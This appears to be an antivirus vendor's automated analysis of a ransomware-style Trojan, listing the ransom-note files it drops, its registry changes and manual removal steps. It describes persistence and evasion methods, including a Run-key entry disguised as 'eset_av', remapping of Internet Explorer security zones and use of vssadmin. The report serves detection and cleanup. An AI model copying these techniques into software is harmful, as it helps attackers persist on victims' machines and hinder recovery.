%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\howto_recover_files_xnidj.txt (2 bytes)
%System%\config\SOFTWARE.LOG (5702 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\8\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\1\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Entertainment\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\MMC\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Templates\winword.doc (426 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.msn[1].txt (988 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\61\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Protect\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (1478 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\34\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\23\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Videos\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[2].txt (1084 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\55\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\38\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Wireshark\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\52\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky.122.2o7[2].txt (1084 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\56\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\WinPcap\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Entertainment\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\58\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\35\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\PrintHood\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\4\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\29\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\42\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (1318 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\42\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\37\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\48\howto_recover_files_xnidj.html (6 bytes)

Registry activity

The process %original file name%.exe:1904 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 7B 41 9E 02 3B A4 76 32 DF CE E5 E0 2F 13 76"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process vcwrms.exe:1572 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"VSSADMIN.EXE" = "Command Line Interface for Microsoft® Volume Shadow Copy Service"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\7A3DC8A074539F6]
"data" = "31 4E 44 4B 69 61 69 70 4A 36 57 6D 53 58 77 68"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 09 0B 34 C2 42 30 42 6F EB FB 04 DD 5F 37 5E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\zsys]
"ID" = "7A 3D C8 A0 07 45 39 F6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"

"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLinkedConnections" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"eset_av" = "%Documents and Settings%\%current user%\Application Data\vcwrms.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"eset_av" = "C"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process vssadmin.exe:228 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB B6 12 9A 22 0E DA 23 AF 13 10 2D E6 31 84 4F"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1904
    vssadmin.exe:228

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Application Data\vcwrms.exe (2105 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-19\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\GHISLER\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\22\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\40\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\12\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\9.0\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\10\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\22\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\36\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#s.ytimg.com\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Local Settings\History\History.IE5\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\33\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Accessibility\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\howto_recover_files_xnidj.html (6 bytes)
    C:\RECYCLER\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Favorites\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\57\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\GHISLER\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#kiks.yandex.ru\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Cookies\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\45\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\8\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Accessories\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\19\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Protect\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\3\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (1248 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\19\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\SendTo\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\56\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\53\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\8\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\0\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\48\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\21\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\33\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\Install\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Application Data\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\27\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\51\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\52\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Accessories\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\54\howto_recover_files_xnidj.txt (2 bytes)
    C:\totalcmd\NO.BAR (892 bytes)
    %Documents and Settings%\Default User\SendTo\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\40\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Protect\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\50\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@bostonhygiene[1].txt (1198 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.html (6 bytes)
    C:\RECYCLER\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Templates\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\57\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\2\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Application Data\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\31\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\58\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\44\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\45\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\28\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\kiks.yandex.ru\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Recent\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\45\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Templates\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Forms\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#s.ytimg.com\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\NetHood\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\16\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\47\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\0\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Templates\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@vk[2].txt (1180 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\24\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Windows\howto_recover_files_xnidj.html (6 bytes)
